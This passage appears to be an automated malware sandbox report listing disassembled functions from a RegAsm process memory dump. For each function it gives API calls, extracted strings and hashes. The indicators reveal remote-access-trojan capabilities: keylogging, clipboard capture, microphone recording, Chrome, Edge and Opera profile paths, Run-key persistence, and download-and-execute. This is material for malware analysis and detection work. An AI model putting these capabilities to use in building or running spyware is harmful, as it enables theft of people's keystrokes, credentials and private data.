                                • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • CloseHandle.KERNEL32(00000000), ref: 0041C233
                                • CloseHandle.KERNEL32(00000000), ref: 0041C23B
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleOpenProcess
                                • String ID:
                                • API String ID: 39102293-0
                                • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                • _UnwindNestedFrames.LIBCMT ref: 00439891
                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                • String ID:
                                • API String ID: 2633735394-0
                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: MetricsSystem
                                • String ID:
                                • API String ID: 4116985748-0
                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                Download Yara Rule
                                APIs
                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                  • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                • String ID:
                                • API String ID: 1761009282-0
                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                Download Yara Rule
                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHandling__start
                                • String ID: pow
                                • API String ID: 3213639722-2276729525
                                • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 0040B797
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                • API String ID: 1881088180-3686566968
                                • Opcode ID: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
                                • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                • Opcode Fuzzy Hash: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
                                • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ACP$OCP
                                • API String ID: 0-711371036
                                • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                Strings
                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: KeepAlive | Enabled | Timeout:
                                • API String ID: 481472006-1507639952
                                • Opcode ID: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
                                • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                • Opcode Fuzzy Hash: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
                                • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32 ref: 00416640
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadFileSleep
                                • String ID: !D@
                                • API String ID: 1931167962-604454484
                                • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: | $%02i:%02i:%02i:%03i
                                • API String ID: 481472006-2430845779
                                • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: alarm.wav$hYG
                                • API String ID: 1174141254-2782910960
                                • Opcode ID: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                                • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                • Opcode Fuzzy Hash: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
                                • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                • String ID: Online Keylogger Stopped
                                • API String ID: 1623830855-1496645233
                                • Opcode ID: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                                • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                • Opcode Fuzzy Hash: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                                • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                Download Yara Rule
                                APIs
                                • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
                                • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferHeaderPrepare
                                • String ID: XMG
                                • API String ID: 2315374483-813777761
                                • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocaleValid
                                • String ID: IsValidLocaleName$JD
                                • API String ID: 1901932003-2234456777
                                • Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                • Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                • API String ID: 1174141254-4188645398
                                • Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                • Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                • API String ID: 1174141254-2800177040
                                • Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                • Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: AppData$\Opera Software\Opera Stable\
                                • API String ID: 1174141254-1629609700
                                • Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                • Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyState.USER32(00000011), ref: 0040B64B
                                  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                  • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                  • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                                  • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                  • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                • String ID: [AltL]$[AltR]
                                • API String ID: 2738857842-2658077756
                                • Opcode ID: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                                • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                • Opcode Fuzzy Hash: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                                • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: uD
                                • API String ID: 0-2547262877
                                • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: !D@$open
                                • API String ID: 587946157-1586967515
                                • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyState.USER32(00000012), ref: 0040B6A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: State
                                • String ID: [CtrlL]$[CtrlR]
                                • API String ID: 1649606143-2446555240
                                • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: ,kG$0kG
                                • API String ID: 1881088180-2015055088
                                • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteOpenValue
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                • API String ID: 2654517830-1051519024
                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteDirectoryFileRemove
                                • String ID: pth_unenc
                                • API String ID: 3325800564-4028850238
                                • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ObjectProcessSingleTerminateWait
                                • String ID: pth_unenc
                                • API String ID: 1872346434-4028850238
                                • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
